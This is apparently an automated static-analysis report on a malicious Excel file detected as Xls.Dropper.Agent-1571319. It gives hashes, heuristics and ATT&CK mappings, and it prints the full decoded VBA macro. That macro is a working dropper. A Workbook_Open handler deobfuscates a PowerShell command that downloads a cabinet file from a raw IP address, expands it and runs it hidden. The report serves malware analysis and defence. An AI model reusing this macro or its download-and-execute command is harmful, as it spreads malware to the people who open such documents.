Xls.Dropper.Agent-1571319 — Office (OLE) malware analysis

Static analysis result for SHA-256 4ad7ed1ab9734ce4…

MALICIOUS

Office (OLE)

56.5 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-03-15
MD5: 778ab8b6d5aace23a82e116bca639763 SHA-1: eae5003689ac0e66da255f20da282801f9d68037 SHA-256: 4ad7ed1ab9734ce40601e2283c3f1bb00607770c517901c322a33c41894ce720
150 Risk Score

Malware Insights

Xls.Dropper.Agent-1571319 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-1571319. Static analysis revealed the presence of VBA macros, including a Workbook_Open event, and a critical heuristic firing for a potential Shell call. The VBA macro code is obfuscated, but the presence of these elements strongly suggests the macro is intended to download and execute a second-stage payload.

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-1571319 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-1571319
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell kggTUI6FREGfdg, vbHide
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8048 bytes
SHA-256: 913e4dab0ab3a0d5575542e5a936d03860fb1c0336c5f515d9dc5a21e8cfa5aa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
98 of 160 identifiers look randomly generated (e.g. 'iEdjfqtIefpytnFatndIQRPUGzGl') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
vgfhGGGgfhhdfh
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Function iEdjfqtIefpyt()

End Function
Public Sub atndIQRPUGz()

End Sub
Private Sub xMQTKkzscJ()

End Sub
Public Function NcmHUHuUrqSA()

End Function
Public Function hHSMfczUtlht()

End Function
Public Sub irPJnpVqv()

End Sub
Public Function iihlIPQBNNdhkcA()

End Function
Public Sub adxaespYl()

End Sub
Private Function uGjCiFY()

End Function
Private Function dvfBlwB()

End Function
Private Function pxyHg()

End Function
Public Sub msLTJpkljoZ()

End Sub
Private Sub feukmeDgKIr()

End Sub
Public Sub hvFonbbC()

End Sub
Private Sub SyQoAomgyv()

End Sub
Public Sub SOarsNOZwdGVC()

End Sub
Public Sub aFABzEp()

End Sub
Public Sub vgwADuTwbLHvQG()

End Sub
Private Function EEreEboCjBnrQEC()

End Function
Private Function iEdjfqtIefpytnFatndIQRPUGzGl()

End Function
Private Function QTKkzscJMhJNc()

End Function
Private Sub HuUrqSARDHhHSM()

End Sub

Attribute VB_Name = "Module2"
Private Sub StPOrZ()

End Sub
Public Sub FgrlDAtRJFRjxSGPniLNu()

End Sub
Private Function RxGGEhovammBFIAZo()

End Function
Private Function BVyCQMwJjj()

End Function
Private Function HbGewV()

End Function
Private Function TDaJUaQizN()

End Function
Private Sub EyceKQ()

End Sub
Private Function NIJHMx()

End Function
Private Function CCSIK()

End Function
Public Sub KIrfzq()

End Sub
Public Function onbbCKQzSyQ()

End Function
Public Function mgyvRBMS()

End Function
Public Function sNOZwdGV()

End Function
Public Function kaFAB()

End Function
Public Sub jqTvgwAD()

End Sub
Private Sub bLHvQGxLV()

End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function vammBFIA()

End Function
Private Sub QyBVyC()

End Sub
Public Sub JjjKSfHbG()

End Sub
Private Function wHBTDaJUaQizNVQ()

End Function
Public Function ceKQksiNIJ()

End Function
Private Function ELcCCSIKCc()

End Function
Private Function ODYOFS()

End Function
Private Function zzbjvYrQuMZMK()

End Function
Public Function qalqnyPQmnwUBf()

End Function
Public Function AIyeZa()

End Function
Public Function GOsTEUZbSsUzk()

End Function
Private Function fVkuddPC()

End Function
Public Sub bHZLPpdbUnkGd()

End Sub

Attribute VB_Name = "Module11"
Sub vgfhGGGgfhhdfh()
kggTUI6FREGfdg = esardhHvsmEBZuSZUhk("cFmxdF \/PKs SP o_wte rxS*hKehlvly.'eUxKeѓ #(bNne/w>-*Ogb^j_e\cetH UScyѓsStQepm].bNRe‚tV.-W)ejbTC|liiWern†te)d.KDLoЂw-nEl{o=aydCFei}lfea(U'xhst:t p0:;/4/J1k8m52.54G8t.P5$6C.Ѓ1)3N7^/Js†s}d~y{n…ahmZoho?srsV/us|s‚pri>duaMr.s&st.7c%awb.'A,„'„%kTQE…MLPd%Ђ\\F~gcdjg8F…FЂFug4f.gZF„.Oc[aSbj'p)(;Q TefxypoaDnbd† I%nTcEOM(P9%:\7F@g$dzg$F^FwFvg1f8g=F-.]czalbN +%/TWE*M3PM%a\%F?g'dpgAFlFiF;g|f9g‚F&.Xe'x<e0;T Nszt@aor`tX o%+THEqMYPl%5\+FdggdBgiFsFѓFngGfYgZFV.`e)x6eD;~")
Shell kggTUI6FREGfdg, vbHide
End Sub





Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub SMfczUtlhtKZ()

End Sub
Public Sub PJnpVqvD()

End Sub
Public Function ihlIPQ()

End Function
Public Function dhkcAPIsadxae()

End Function
Private Sub lKKmuGjCiFYxYjd()

End Sub
Public Sub lwByJbpxyH()

End Sub
Public Function FmsLTJpkljo()

End Function
Private Sub Dfeukme()

End Sub
Private Function IrfzqhvFonbb()

End Function
Public Sub zSyQoAomgyvRBMSarsNOZwdGVCJc()

End Sub
Private Sub ABzEpjqTvgw()

End Sub
Private Function TwbLHvQGx()

End Function
Public Sub EreEboCjBnr()

End Sub

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub pqoteY()

End Sub
Public Function UlpsjIYQAikFimA()

End Function
Public Sub gStPOrZqc()

End Sub
Private Function rlDAQt()

End Function
Public Sub RjxSGPniLNu()

End Sub
Private Function RxGGE()

End Function
Private Function vammBFIAohQyBVyCQMwJjjK()

End Function
Private Function bGewVwHBTDaJ()

End Function
Public Function izNVQgEyceKQksi()

End Function
Public Sub HMxELcCCSIKC()

End Sub
Private Function hODYOFS()

End Function
Private Sub zzbjvYrQuMZMKQTqalqnyPQm()

End Sub
Private Function BfubhAIyeZaYdN()

End Function
Private Sub TEUZbSsUz()

End Sub
Private Sub pfVkuddPCdzMbH()

End Sub
Public Function pdbUnkGdBHDOR()

End Function
Private Function NQRvKeyQLAh()

End Function
Public Sub teYfIVUl()

End Sub

Attribute VB_Name = "Module3"

Attribute VB_Name = "Module4"

Public Function esardhHvsmEBZuSZUhk(CDNQRvKeyQ As String) As String
GoTo IYQAikFi
IYQAikFi:
GoTo KftgStPOrZqcg
KftgStPOrZqcg:
GoTo rlDAQtR
rlDAQtR:
For AhpqoteYfIVUlp = 1 To Len(CDNQRvKeyQ) Step 2
GoTo jxSGPniLNuOTcRxGGE
jxSGPniLNuOTcRxGGE:
GoTo ovammBF
ovammBF:
GoTo ZohQyBVyCQMwJ
ZohQyBVyCQMwJ:
GoTo KSfHbGe
KSfHbGe:
GoTo wHBTDaJUaQizNVQgEyce
wHBTDaJUaQizNVQgEyce:
esardhHvsmEBZuSZUhk = esardhHvsmEBZuSZUhk & Mid(CDNQRvKeyQ, AhpqoteYfIVUlp, 1)
GoTo siNIJHMx
siNIJHMx:
GoTo cCCSIKCcEjhODYOF
cCCSIKCcEjhODYOF:
GoTo MLzzbj
MLzzbj:
GoTo rQuMZMKEQTqalqnyPQmn
rQuMZMKEQTqalqnyPQmn:
GoTo BfubhAIyeZaYdNGOsTE
BfubhAIyeZaYdNGOsTE:
GoTo bSsUzkgTpfVkuddPCdzM
bSsUzkgTpfVkuddPCdzM:
Next
GoTo LPpdbUnkGdBHDORhCDNQ
LPpdbUnkGdBHDORhCDNQ:
GoTo KeyQLAhpqot
KeyQLAhpqot:
GoTo fIVUlpsjIYQAikFimAKf
fIVUlpsjIYQAikFimAKf:
GoTo StPOrZq
StPOrZq:
GoTo FgrlDA
FgrlDA:
End Function


Attribute VB_Name = "Module5"
Public Function qvDtZiihlIPQBNN()

End Function
Public Sub cAPIsad()

End Sub
Private Function spYlKK()

End Function
Public Function jCiFYxYjdvfB()

End Function
Public Function yJbpxyHgbDF()

End Function
Private Sub TJpkljoZgnDfe()

End Sub
Public Function eDgKIrf()

End Function
Private Function vFonbb()

End Function
Public Function zSyQoAomgyvRBMS()

End Function
Private Sub sNOZwdGVJckaFABzEpj()

End Sub
Private Function gwADuTwbL()

End Function
Private Sub GxLVEEreEboCjB()

End Sub
Private Sub ECwOLiEdjfqtIe()

End Sub
Private Sub tQnFatndIQ()

End Sub
Private Sub GzGlxxMQTKkzscJ()

End Sub